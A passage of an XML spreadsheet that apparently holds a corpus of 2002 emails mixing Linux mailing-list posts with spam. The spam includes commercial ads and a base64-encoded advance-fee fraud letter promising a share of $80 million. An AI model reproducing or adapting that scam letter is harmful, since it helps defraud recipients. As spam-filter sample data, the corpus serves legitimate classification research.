 MOVED FROM THIS MAILING&lt;/A&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff=
 " style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSS=
 ERIF" FACE=3D"Arial" LANG=3D"0"&gt; &lt;BR&gt;
 &lt;/FONT&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: private
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_002B_83A1E322.4D8B344B
 Content-Type: text/plain
 Content-Transfer-Encoding: base64
 LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NClRoaXMgbWVzc2FnZSB3
 YXMgc2VudCBieSBFeHByZXNzIERpcmVjdCBFbWFpbCBCbGFzdGVyIFY1LjEsIA0KeW91IGNh
 biBkb3dubG9hZCBpdCBmcm9tOiBodHRwOi8vd3d3LmZhc3RidWxrZW1haWwuY29tIA0KRXhw
 cmVzcyBEaXJlY3QgRW1haWwgQmxhc3RlciBpcyBhIHBvd2VyZnVsIGVtYWlsIG1hcmtldGlu
 ZyB0b29sISENCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCg0KDQpE
 ZWFyIHNpci9tYWRhbQ0KDQpXaXRoIGdvb2QgcmVjb21tZW5kYXRpb24sSSAgZGVjaWRlZCB0
 byBjb250YWN0IHlvdS4NCkkgYW0gUFJJTkNFIERBVklEICBTQVZJTUJJLCB0aGUgc29uIG9m
 IEpPTkFTIFNBVklNQkkgLHRoZSBsZWFkZXIgb2YgdGhlDQpVTklUQSByZWJlbCBpbiBBTkdP
 TEEsIHdobyAgd2FzIGtpbGxlZCBpbiBmZWJydWFyeSBieSB0aGUgdHJvb3AgbG95YWwgdG8N
 CnRoZSBnb3Zlcm5tZW50IC5BZnRlciBoaXMgZnVuZXJhbCAgYW5kIGJ1cmlhbCx3ZSBoYWQg
 YSBmYW1pbHkgbWVldGluZyBhbmQNCnJlc29sdmVkIHRvIGludmVzdCB0aGUgbW9uZXkgaGUg
 bGVmdCAgYmVoaW5kIGluIHlvdXIgY291bnRyeSwgaGVuY2UgdGhpcw0KbGV0dGVyIHRvIHlv
 dS5IZSBsZWZ0IHRoZSBzdW0gb2YgJDgwIG1pbGxpb24gIHVzIGRvbGxhcnMgaW4gY2FzaCwg
 d2hpY2ggd2FzDQphIHByb2NlZWQgZnJvbSB0aGUgc2FsZSBvZiBkaWFtb25kcyx3aGljaCB3
 YXMgIHVuZGVyIGhpcyBjb250cm9sLg0KDQpIb3dldmVyLHRoZSBlbnRpcmUgIGRldmVsb3Bt
 ZW50IG1hZGUgdXMgdG8gZmxlZSBBTkdPTEEgdG8gSk9IQU5FU0JVUkcsU09VVEgNCkFGUklD
 QSwgZm9yIGZlYXIgb2YgIGJlaW5nIGtpbGxlZC4NClRoZSBhbW91bnQgb2YgJDgwIG1pbGxp
 b24gIHVuaXRlZCBzdGF0ZXMgZG9sbGFycyBpbiBjYXNoIGlzIHByZXNlbnRseSBpbiBvdXIN
 CnBvc3Nlc3Npb24sIGFuZCBJIHdvdWxkIHdhbnQgaXQgIHRvIGJlIGludmVzdGVkIGluIHlv
 dXIgY291bnRyeSxkdWUgdG8gdGhlDQpzdGFiaWxpdHkgb2YgeW91ciBlY29ub215LlRoZSBt
 b25leSBpcyAgcHJlc2VudGx5IHdpdGggYW4gZW1lcmdlbmN5DQpkaXBsb21hdGljIHNlY3Vy
 aXR5IGNvdXJpZXIgY29tcGFueSx3aGljaCBteSBtb3RoZXIgYW5kIEkgaHVycmllZGx5IHVz
 ZWQgdG8gbW92ZSB0aGUNCmNhcmdvIG91dCBmcm9tIG91ciBjb3VudHJ5IHRvIFNPVVRIIEFG
 UklDQS5XZSAgcmVnaXN0ZXJlZCBpdCB1bmRlciBhIHNlY3VyaXR5DQpjb2RlIHdpdGggbm8g
 bmFtZSwgYW5kIHdhcyByZWdpc3RlcmVkIGFzICBjb250YWluaW5nIHBob3RvZ3JhcGhpYyBw
 YXBlcg0KbWF0ZXJpYWwuDQoNCk15IG1vdGhlciBhbmQgSSBoYXZlIHJlc29sdmVkIHRvIGdp
 dmUgeW91ICAxNSUgb2YgdGhlIHRvdGFsIHN1bSBmb3IgeW91ciBhc3Npc3RhbmNlIGluDQpn
 ZXR0aW5nIHRoaXMgZnVuZHMgdHJhbnNmZXJyZWQgdG8gIHlvdXIgcmVsaWFibGUgY29tcGFu
 eSdzIGFjY291bnQgaW4geW91cg0KY291bnRyeSxmb3IgaW52ZXN0bWVudC5XZSBoYXZlIGVx
 dWFsbHkgIHJlc29sdmVkIHRvIHNwZW5kIHRoZSByZXN0IG9mIG91cg0KbGl2ZXMgaW4geW91
 ciBjb3VudHJ5LllvdSBoYXZlIHRvICBtYWtlIHRyYXZlbGluZyBhcnJhbmdlbWVudA0Kb2Yg
 Y29taW5nIHRvIEpPSEFORVNCVVJHLFNPVVRIIEFGUklDQSxpbW1lZGlhdGVseSB0byAgbWVl
 dCB3aXRoIG1lIGZhY2UgdG8NCmZhY2UgYW5kIHNlZSB0aGUgZnVuZHMgcGh5c2ljYWxseSx0
 aGVuIGhhdmUgaXQgdHJhbnNmZXJyZWQgIHRvIHlvdXINCmFjY291bnQuQWZ0ZXJ3aGljaCBi
 b3RoIG9mIHVzIHdvdWxkIHRyYXZlbCB0b2dldGhlciB0byB5b3VyIGNvdW50cnkgZm9yDQpz
 aGFyaW5nIGFuZCBpbW1lZGlhdGUgaW52ZXN0bWVudCx0aGVuIG15IGZhbWlseSB3aWxsIGpv
 aW4gbWUgbGF0ZXIuDQoNCkFzIHdlIGF3YWl0IHlvdXIgdXJnZW50ICByZXBseSwgc3RyaWN0
 bHkgdGhyb3VnaCBteSBlLW1haWwgZGF2c2F2QG1ha3Rvb2IuY29tIG9yDQogZGF2aWRzYXZp
 bWJpQG1ha3Rvb2IuY29tICBvciBteSBwcml2YXRlIHBob25lIG51bWJlciArODgyIDEgNjQ2
 Njg1MjI5LiAgeW91cg0KYWJzb2x1dGUgdHJ1c3QgYW5kIGNvbmZpZGVudGlhbGl0eSBpcyBo
 aWdobHkgc29saWNpdGVkIHRvIHNlcnZlIHVzIGJldHRlci4NCg0KQmVzdCByZWdhcmQNClBS
 SU5DRSBEQVZJRCBTQVZJTUJJICAgIA==
 ------=_NextPart_000_002B_83A1E322.4D8B344B--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: req: Falcon's eye
</t>
  </si>
  <si>
    <t xml:space="preserve">Another thing I see in debian but not in my RH boxen.
 http://falconseye.sourceforge.net/
 It's a GL(?) interface to nethack :)
 -- 
 "And don't even think of quoting me out of context ;)"
 	-- Michael Hinz in the Monastery
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Checking that cronjobs actually ran?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi ladies,
 I setup a cron job to do a full backup to tape drive there last night, but
 I'm just wondering how I can verify that it actually ran? 
 I suppose that a mail will be sent to root as I ran crontab -e as root. Is
 that correct or should I be looking elsewhere?
 Thanks to everyone who replies in advance. 
 Best Regards
 CW
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 It has been signed conforming to RFC2015.
 You'll need PGP or GPG to check the signature.
 ------------=_1031642648-417-32
 Content-Type: text/plain; charset=us-ascii
 On Mon, 09 Sep 2002 22:06:58 CDT, Hal DeVore writes:
 &gt;		scan `mhpath +`/$f/.xmhcache
 Shouldn't that read
                scan &gt;`mhpath +`/$f/.xmhcache
  ?
 (And, JIC something else changed the context in the background, it 
  doesn't hurt to explicitly state the folder:
                scan "+$f" &gt;`mhpath +`/$f/.xmhcache
  )
 cheers,
 &amp;rw
 -- 
 -- "The problem with the IBM keyboards I have is that when you
 -- use them to beat lusers, the caps come off the keys.
 -- No real damage, but still a nuisance."   -- Martijn Berlage
 ------------=_1031642648-417-32
 Content-Type: application/pgp-signature; name="signature.ng"
 Content-Disposition: inline; filename="signature.ng"
 Content-Transfer-Encoding: 7bit
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9fZ4YE0NzSJr53oIRAlxqAJsG8DKAx7bxB6bGzz70VdsAkx6UiQCdG8pJ
 s2JuFuUt7Kaz3xb0JyOx87A=
 =RFA6
 -----END PGP SIGNATURE-----
 ------------=_1031642648-417-32--
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message ----- 
 From: "Gregory Alan Bolcer" &lt;gbolcer@endeavors.com&gt;
 &gt; I went out and drew some chalk circles on my
 &gt; sidewalk just so I wouldn't miss out on the experience.
 &gt; I've collected half a dozen passwords &amp;
 &gt; access to email accounts so far.
 &gt; 
 &gt; Greg
 hahaha! &lt;joke&gt;It takes a thief to catch a thief?&lt;/joke&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] Sun Solaris..
</t>
  </si>
  <si>
    <t xml:space="preserve">In a nutshell - Solaris is Suns own flavour of UNIX.
 &gt; -----Original Message-----
 &gt; From: Kiall Mac Innes [mailto:kiall@redpie.com] 
 &gt; Sent: 22 August 2002 17:23
 &gt; To: ILUG
 &gt; Subject: [ILUG] Sun Solaris..
 &gt; 
 &gt; 
 &gt; Can someone explain what type of operating system Solaris 
 &gt; is... as ive never seen or used it i dont know wheather to 
 &gt; get a server from Sun or from DELL i would prefer a linux 
 &gt; based server and Sun seems to be the one for that but im not 
 &gt; sure if Solaris is a distro of linux or a completely 
 &gt; different operating system? can someone explain...
 &gt; 
 &gt; Kiall Mac Innes
 &gt; 
 &gt; 
 &gt; -- 
 &gt; Irish Linux Users' Group: ilug@linux.ie 
 &gt; http://www.linux.ie/mailman/listinfo/ilug for 
 &gt; (un)subscription information. List maintainer: listmaster@linux.ie
 &gt; 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: the captain has turned off the "no hittin' it" sign
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=58104
 Date: Not supplied
 http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=58104
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I'm a bit confused about this boycott thing.  How is what China is
 doing any different than having Scientology and who ever else
 state-side who takes the whim evoking the DMCA to close down foreign
 sites they deem inappropriate?  At least the Chinese make it voluntary
 and ask politely, rather than just sending legal musclemen first off.
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] mutt replies
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi David,
 Try putting "set reverse_name" in your .muttrc.
 Regards,
 Gavin.
 **********************************************************************
 This email and any files transmitted with it are confidential and
 intended solely for the use of the individual or entity to whom they
 are addressed. If you have received this email in error please notify
 the system manager.
 This footnote also confirms that this email message has been swept by
 MIMEsweeper for the presence of computer viruses.
 www.mimesweeper.com
 **********************************************************************
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">You can also duplicate thiswith
 MsgChange - noshow
 at the Tcl prompt in the Log window.  I suspect that the sequence
 parser, which understands things like 5-22 to mean messages 5 through 22
 is confused when asked to add/remove message "-" from a sequence.
 If we are allowed to assume 8.2 or higher, which we can't really, then
 we could add
 if {![string is integer $select(sel)]} {
    # bail out of message select mode
 }
 to the SelectTypein procedure.
 We can probably survive with
 if {![regexp {^[0-9]+$} $select(sel)]} {
     #bail out of message select mode
 }
 &gt;&gt;&gt;Robert Elz said:
  &gt;     Date:        Mon, 26 Aug 2002 09:27:56 -0500
  &gt;     From:        Chris Garrigues &lt;cwg-dated-1030804078.e8b0d5@DeepEddy.Co
 m&gt;
  &gt;     Message-ID:  &lt;1030372078.11075.TMDA@deepeddy.vircio.com&gt;
  &gt; 
  &gt;   | Tell me what keystroke made it happen so I can reproduce it and I'll
  &gt;   | see what I can do about it (or if I can't, I'll hand it off to 
 Brent).
  &gt; 
  &gt; Don't worry too much about it, you seem to have plenty of other things
  &gt; to do in the immediate future, and this one isn't so critical that people
  &gt; can't use the code in normal ways.
  &gt; 
  &gt; But, to make it happen, type (with normal key bindings) any digit, so the
  &gt; code thinks you're trying a message number, then backspace, so the digit
  &gt; goes away, then '-' (other junk characters don't seem to have the
  &gt; problem, I have just been playing).   That will do it (every time).
  &gt; 
  &gt; That is: 0 ^h -
  &gt; 
  &gt; Once you get into that state, the same traceback occurs for every
  &gt; character you type, until a message is selected with the mouse.
  &gt; 
  &gt; This is looking like it might be easy to find and fix, so I'll take a
  &gt; look at it later.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</si>
  <si>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Subject: Police pay damages to journalist
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655706,215/
 Date: 2002-10-08T03:31:00+01:00
 BBC reporter Donal MacIntyre wins high profile libel case against police.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get the Computer Skills you need - Free
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a multi-part message in MIME format.
 --______BoundaryOfDocument______
 Content-Type: text/plain
 Content-Transfer-Encoding: 7bit
 FREE CD-ROM LESSONS
 http://isis.webstakes.com/play/Isis?ID=89801
 - Choose from 15 titles
 - Learn new skills in 1 hour
 - Compare at $59.95
 - Quick, easy and FREE!
 Get FREE* computer learning from Video Professor on a subject of your
 choice.  For over 14 years, Video Professor has taught millions of people
 how to use their computers, and we can teach you too, FREE.
 Get Your FREE Lesson Today!
 http://isis.webstakes.com/play/Isis?ID=89801
 Simple 'What You See Is What You Get' way to learn
 - Plays like a video on your computer screen
 - A complete &amp; comprehensive lesson FREE &amp; RISK FREE
 - Over 3 million satisfied user
 Select from these titles available FREE...
 Windows, Outlook, Excel, Access, Powerpoint, FrontPage, Works, Quicken,
 Internet, Word, WordPerfect, Lotus 1-2-3, DOS
 Get Your FREE Lesson Today!
 http://isis.webstakes.com/play/Isis?ID=89801
 * You only pay $6.95 shipping and handling conveniently billed to your
 Visa, Mastercard, America Express or Discover Card. Windows compatible
 only. Some restrictions may apply.
 --------------------------------
 Webstakes.com - Where INSTANT WINNING happens daily!
 Webstakes.com Customer Service
 http://home.webstakes.com/play/HomePage?temp=2201&amp;tb_id=301
 http://www.webstakes.com
 This email was sent to ler@lerami.lerctr.org.
 You are receiving this email because you opted-in to 
 periodically receive emails with special offers from 
 Webstakes.com. If you'd  like to unsubscribe from 
 future emails, please see below.
 http://service.ivillage.com/Apps/DCS/mcp?r=7003B9351TAWR01200027c03B930mrvm4rvqf
 (If the above link does not work, please copy and 
 paste the entire  into your browser)
 --______BoundaryOfDocument______
 Content-Type: text/html
 Content-Transfer-Encoding: 7bit
 &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=iso-8859-1"&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Untitled Document&lt;/TITLE&gt;
 &lt;META content="text/html; charset=iso-8859-1" http-equiv=Content-Type&gt;
 &lt;STYLE type=text/css&gt;.copy {
 	FONT-FAMILY: "Times New Roman", Times, Georgia, serif; FONT-SIZE: 10pt; FONT-WEIGHT: normal; MARGIN-TOP: -20px; TEXT-ALIGN: left
 }
 .its {
 	FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; FONT-SIZE: 14pt; FONT-WEIGHT: bold; WORD-SPACING: -1px
 }
 &lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff&gt;&lt;CENTER&gt;
 &lt;TABLE align=center border=0 cellPadding=0 cellSpacing=0 width=500&gt;
 &lt;TR&gt;
     &lt;TD colSpan=4&gt;
       &lt;P align=center&gt;&lt;A href="http://isis.webstakes.com/play/Isis?ID=89801"&gt;&lt;IMG 
       src="http://www3.videoprofessor.com/images/johncd.jpg"&gt;&lt;/A&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;BR&gt;
 &lt;TABLE align=center border=0 cellPadding=0 cellSpacing=0 width=500&gt;
   &lt;TR vAlign=top&gt;
     &lt;TD width=235&gt;
       &lt;P&gt;&lt;SPAN class=copy&gt;&lt;SPAN class=its&gt;&lt;IMG align=right height=89 hspace=2 
       src="http://www3.videoprofessor.com/images/family.jpg" vspace=2 
       width=150&gt;It&amp;#8217;s FAST!&lt;/SPAN&gt; You&amp;#8217;ll be up and running in an hour! Don&amp;#8217;t 
       waste time sifting through manuals, commuting to classes or seminars. Just 
       pop in the CD-ROM and you&amp;#8217;re learning!&lt;/SPAN&gt;&lt;/P&gt;
       &lt;P&gt;&lt;SPAN class=copy&gt;&lt;SPAN class=its&gt;It&amp;#8217;s EASY!&lt;/SPAN&gt; It&amp;#8217;s as simple as 
       1-2-3! Video Professor&amp;#8217;s straightforward &amp;#8220;What-You-See-Is-What-You-Do&amp;#8221; 
       approach makes learning as easy as watching TV!&lt;/SPAN&gt;&lt;/P&gt;
       &lt;P&gt;&lt;SPAN class=copy&gt;&lt;SPAN class=its&gt;It&amp;#8217;s CONVENIENT!&lt;/SPAN&gt; We&amp;#8217;re ready to 
       teach you day and night! With your busy schedule, you don&amp;#8217;t have time to 
       waste at classes or seminars. Don&amp;#8217;t fumble through boring manuals. 
       Whatever your schedule, we&amp;#8217;re ready when you are!&lt;/SPAN&gt;&lt;/P&gt;
       &lt;P&gt;&lt;SPAN class=copy&gt;&lt;SPAN class=its&gt;It&amp;#8217;s COMPLETE!&lt;/SPAN&gt; These aren&amp;#8217;t 
       short teaser lessons. Each 60-minute lesson takes you from installing the 
       software to more advanced skills. And they&amp;#8217;re not just for beginners! 
       We&amp;#8217;ll surprise you with the knowledge you&amp;#8217;ll gain!&lt;/SPAN&gt;&lt;BR&gt;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
     &lt;TD width=235&gt;
       &lt;P&gt;&lt;SPAN class=copy&gt;&lt;IMG height=3 src="http://www3.videoprofessor.com/images/black.gif" width="100%"&gt;&lt;BR&gt;&lt;IMG 
       height=10 src="http://www3.videoprofessor.com/images/white.gif" width=5&gt;&lt;SPAN class=its&gt;&lt;BR&gt;Why Am I Making This 
       Incredible Offer?&lt;/SPAN&gt;&lt;BR&gt;&lt;IMG height=10 src="http://www3.videoprofessor.com/images/white.gif" width=5&gt;&lt;SPAN 
       class=its&gt;&lt;/SPAN&gt;&lt;BR&gt;I&amp;#8217;m so confident that once you try my exceptional 
       &amp;#8220;What-You-See-Is-What-You-Do&amp;#8221; learning method, you&amp;#8217;ll turn to us for all 
       your computer learning needs.&lt;/SPAN&gt;&lt;/P&gt;
       &lt;P&gt;&lt;IMG height=3 src="http://www3.videoprofessor.com/images/black.gif" width="100%"&gt;&lt;BR&gt;&lt;/P&gt;
       &lt;P&gt;&lt;SPAN class=copy&gt;&lt;SPAN class=its&gt;&lt;IMG align=right height=100 
       src="http://www3.videoprofessor.com/images/cds33.jpg.jpg" width=75&gt;Choose 
       Any Lesson &lt;FONT color=#ff0000&gt;FREE!&lt;/FONT&gt;&lt;/SPAN&gt;&lt;BR&gt;Getting Started with 
       Your Personal Computer &amp;#8226; Windows XP, Me, 98 or 95 &amp;#8226; The Intenet &amp;#8226; Excel &amp;#8226; 
       Word &amp;#8226; Access &amp;#8226; FrontPage &amp;#8226; Outlook &amp;#8226; PowerPoint &amp;#8226; WordPerfect &amp;#8226; Lotus 
       1-2-3 &amp;#8226; Works &amp;#8226; Quicken &amp;#8226; DOS&lt;/SPAN&gt;&lt;/P&gt;
       &lt;P align=center class=its&gt;Get your FREE lesson today!&lt;/P&gt;
       &lt;P align=center class=its&gt;&lt;A href="http://isis.webstakes.com/play/Isis?ID=89801"&gt;&lt;IMG 
       border=0 height=49 
       src="http://www3.videoprofessor.com/images/clickhere.gif" 
       width=111&gt;&lt;/A&gt;&lt;/P&gt;
       &lt;P class=its&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR vAlign=top&gt;
     &lt;TD class=copy colSpan=4&gt;
       &lt;DIV align=center&gt;*You only pay $6.95 shipping and handling conveniently 
       billed to your Visa, MasterCard, America Express or Discover Card. Windows 
       compatible only. Some restrictions may apply. 
 &lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;BR&gt;&lt;SPAN class=copy&gt;&lt;/SPAN&gt;
 &lt;!-- WEBSTAKES.COM FOOTER --&gt;
 &lt;table width=500 bgcolor=#FFFFFF cellpadding=2 cellspacing=0 border=0 align=center&gt;
 	&lt;tr&gt;
 		&lt;td width=500 align=center&gt;
 			&lt;font face=Geneva,Arial size=1&gt;
 				&lt;a href="http://www.webstakes.com/"&gt;
 		&lt;img src="http://www.webstakes.com/zeus/images/direct/wslogolight.gif" width=158 height=54 alt="Webstakes.com" border=0 align=middle&gt;
 				&lt;/a&gt;
 			&lt;br&gt;
 				&lt;a href="http://home.webstakes.com/play/HomePage?temp=2201&amp;tb_id=301"&gt;
 					Webstakes.com customer service
 				&lt;/a&gt;
 			&lt;br&gt;
 				&lt;a href="http://www.webstakes.com/"&gt;
 					http://www.webstakes.com/
 				&lt;/a&gt;
 			&lt;br&gt;&lt;br&gt;
 					This email was sent to ler@lerami.lerctr.org.
 			&lt;br&gt;&lt;br&gt;
 	You are receiving this email because you opted-in to periodically receive emails with special offers from Webstakes.com. If you'd  like to unsubscribe from future emails, please see below.&lt;BR&gt;
 &lt;a href=http://service.ivillage.com/Apps/DCS/mcp?r=7003B9351TAWR01200027a03B930mrvm4rvqf&gt;Click here&lt;/a&gt;
 			&lt;/font&gt;
 			&lt;IMG SRC="http://or.astrology.com/clear.gif?jiffies[73B9303B9351TAWR012000003B930mrvm4rvqf]" BORDER="0"&gt;
 		&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 --______BoundaryOfDocument______--
 Please include the following line in your reply.
 annmn:[73B9303B9351TAWR012000003B930mrvm4rvqf]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Eddie Kessler describes programming at Napster. Ray Ozzie has
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20020925.html
 Date: Not supplied
 Eddie Kessler describes programming at Napster[1]. 
 Ray Ozzie has more on platforms[2]. "Finding the 'right' price point for a 
 software platform is critical." To me this sounds like a fancy way of saying, 
 "I groove all that stuff about how platforms need to be cheap and ubiquitous, 
 but I can't bring myself to do it." The price, Ray says, "must be high enough 
 both 1) to maintain a perception of value in the platform, and 2) to create 
 significant margins well before ubiquity is assured so that the ecosystem is 
 assured of the platform's ultimate viability." What he doesn't mention: if you 
 lower the price on the only product you're selling, you have a revenue hit, 
 which will not make your investors happy, and you may run out of money and have 
 to close. But that must be what he's thinking.
 [1] http://www.joelonsoftware.com/articles/WorstProjectEver.html
 [2] http://www.ozzie.net/blog/stories/2002/09/24/softwarePlatformDynamics.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] tcpd
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 27 Jul 2002, kevin lyda wrote:
 &gt; On Sat, Jul 27, 2002 at 11:58:10AM -0700, Paul O'Neil wrote:
 &gt; &gt; If I want to use tcpd for ftp and only one user will ever ftp but I dont
 &gt; &gt; know what IP that user is because its dialup DHCP how do I setup tcpd for
 &gt; &gt; that user?
 &gt;
 You could at the very least setup tcp wrappers and limit it to the dialup
 domain name.
 /etc/hosts.allow
 in.ftpd: .domain.name
 -kirk
 &gt; please don't reply to messages to send a new topic to ilug.  those of
 &gt; us using threaded mail clients find that really annoying.
 &gt;
 &gt; tcpd is host based filtering/auth.  so if the ip is dynamic, you can't
 &gt; really use it.  however ftp supports user based auth - actually it kind
 &gt; of requires a user, so just set up an account for that person.
 &gt;
 &gt; kevin
 &gt;
 &gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: !Gorgeous,Custom Websites - $349 Complete! (9009zRlD0-486vNhZ47@18)
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Beautiful,Custom Websites for $349 Complete!&lt;/TITLE&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/head&gt;
 &lt;BODY text=#000000 vLink=#000080 aLink=#000080 link=#000080 bgColor=#000080 
 topMargin=7&gt;
 &lt;CENTER&gt;
 &lt;TABLE borderColor=#000000 height=368 cellSpacing=0 cellPadding=3 width=575 
 bgColor=#79a5ff border=1&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=565 bgColor=#000000 height=22&gt;
       &lt;P align=center&gt;&lt;FONT face=Arial color=#ffffff&gt;&lt;B&gt;Beautiful, 100% Custom 
       Websites, $349 Complete!&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD vAlign=top width=565 height=318&gt;
       &lt;DIV align=center&gt;
       &lt;TABLE style="WIDTH: 555px" height=341 cellSpacing=0 cellPadding=0 
       width="60%" border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width="100%" height=366&gt;
             &lt;DIV align=center&gt;
             &lt;TABLE borderColor=#000000 height=5 cellSpacing=0 cellPadding=5 
             width=554 bgColor=#ffffff border=1&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=top width=540 height=1&gt;&lt;FONT color=#ff0000&gt;
                   &lt;TABLE height=61 width="100%" border=0&gt;
                     &lt;TBODY&gt;
                     &lt;TR&gt;
                       &lt;TD width="30%" height=55&gt;
                         &lt;P align=center&gt;&lt;IMG height=100 
                         src="http://7x24.sunshinehui.com/mnbv/csi.gif" width=133 
                         border=0&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/FONT&gt;
                       &lt;TD vAlign=top width="70%" height=55&gt;
                         &lt;P align=center&gt;&lt;STRONG&gt;&lt;FONT face=Arial&gt;&lt;FONT 
                         size=4&gt;Get a beautiful, 100% Custom Web Site (&lt;EM&gt;or 
                         yours redesigned&lt;/EM&gt;)&amp;nbsp;&lt;I&gt;for only 
                         $349&lt;/I&gt;!*&lt;/FONT&gt;&lt;BR&gt;&lt;FONT 
                         color=#ff0000&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT face=Arial 
                         color=#ff0000 size=3&gt;We have references coast to 
                         coast&amp;nbsp;&lt;BR&gt;and will give you &lt;I&gt;plenty of sites to 
                         view!&lt;/I&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
                   &lt;P align=center&gt;&lt;FONT face=Arial size=3&gt;&lt;STRONG&gt;Includes up to 
                   7 pages (you can add more), java rollover buttons, feedback 
                   forms, more. It will be constructed to your taste and 
                   specifications. We do not use templates,&amp;nbsp; &lt;EM&gt;our sites 
                   are completely custom.&amp;nbsp;&lt;/EM&gt;&lt;FONT 
                   color=#ff0000&gt;&amp;nbsp;&amp;nbsp; &lt;/FONT&gt;*&lt;I&gt;Must host with us @ 
                   $19.95/mo (100 Megs, 20 Email accounts, Control Panel, Front 
                   Page, Graphical Statistics, 
                   more).&lt;BR&gt;&lt;/I&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;FONT face=Arial color=#000080 
                   size=4&gt;&lt;BR&gt;&amp;nbsp;&lt;/FONT&gt;&lt;B&gt;&lt;FONT face=Arial size=3&gt; 
                   &lt;/FONT&gt;&lt;I&gt;&lt;FONT face=Arial color=#ff0000 size=3&gt;For sites to 
                   view, complete below or call our message center at 
                   321-726-2209 (24 hours). Your call will be returned 
                   promptly.&lt;/FONT&gt;&lt;/I&gt;&lt;FONT face=Arial color=#000080 
                   size=3&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT face=Arial color=#ff0000 
                   size=3&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;FONT face=Arial size=2&gt;&lt;B&gt;&lt;FONT 
                   color=#0000ff&gt;&lt;I&gt;NOTE:&amp;nbsp;&amp;nbsp; If you are using a web 
                   based email program (such as Yahoo, Hotmail, etc.) the form 
